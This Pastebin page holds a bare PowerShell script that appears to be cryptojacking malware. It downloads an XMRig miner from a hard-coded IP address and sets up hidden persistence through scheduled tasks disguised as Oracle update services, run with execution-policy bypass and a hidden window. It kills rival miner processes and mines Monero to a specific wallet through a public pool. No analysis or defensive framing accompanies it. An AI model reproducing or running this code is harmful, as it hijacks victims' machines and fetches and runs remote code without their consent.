Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $ne = $MyInvocation.MyCommand.Path
- $nurl = "http://67.231.243.10:8220/xmrig.exe"
- $noutput = "$env:TMP\yam.exe"
- $vc = New-Object System.Net.WebClient
- $vc.DownloadFile($nurl,$noutput)
- copy $ne $HOME\SchTask.ps1
- copy $env:TMP\yam.exe $env:TMP\xe.exe
- SchTasks.exe /Create /SC MINUTE /TN "Update service for Oracle products9" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File $HOME\SchTask1.ps1" /MO 6 /F
- SchTasks.exe /Delete /TN "Update service for Oracle products" /F
- SchTasks.exe /Delete /TN "Update service for Oracle products5" /F
- SchTasks.exe /Delete /TN "Update service for Oracle products1" /F
- SchTasks.exe /Delete /TN "Update service for Oracle products2" /F
- SchTasks.exe /Delete /TN "Update service for Oracle products3" /F
- SchTasks.exe /Delete /TN "Update service for Oracle products4" /F
- SchTasks.exe /Delete /TN "Update service for Oracle products7" /F
- SchTasks.exe /Delete /TN "Update service for Oracle products8" /F
- SchTasks.exe /Delete /TN "Update service for Oracle products0" /F
- while ($true) {
- if(!(Get-Process xe -ErrorAction SilentlyContinue)) {
- echo "Not running"
- cmd.exe /C taskkill /IM ddg.exe /f
- cmd.exe /C taskkill /IM yam.exe /f
- cmd.exe /C taskkill /IM miner.exe /f
- cmd.exe /C taskkill /IM xmrig.exe /f
- cmd.exe /C taskkill /IM nscpucnminer32.exe /f
- cmd.exe /C taskkill /IM 1e.exe /f
- cmd.exe /C taskkill /IM iie.exe /f
- cmd.exe /C taskkill /IM 3.exe /f
- cmd.exe /C taskkill /IM iee.exe /f
- cmd.exe /C taskkill /IM ie.exe /f
- cmd.exe /C taskkill /IM je.exe /f
- cmd.exe /C $env:TMP\xe.exe --donate-level=1 -k -a cryptonight -o stratum+tcp://monerohash.com:5555 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x
- } else {
- echo "Running"
- }
- Start-Sleep 55
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
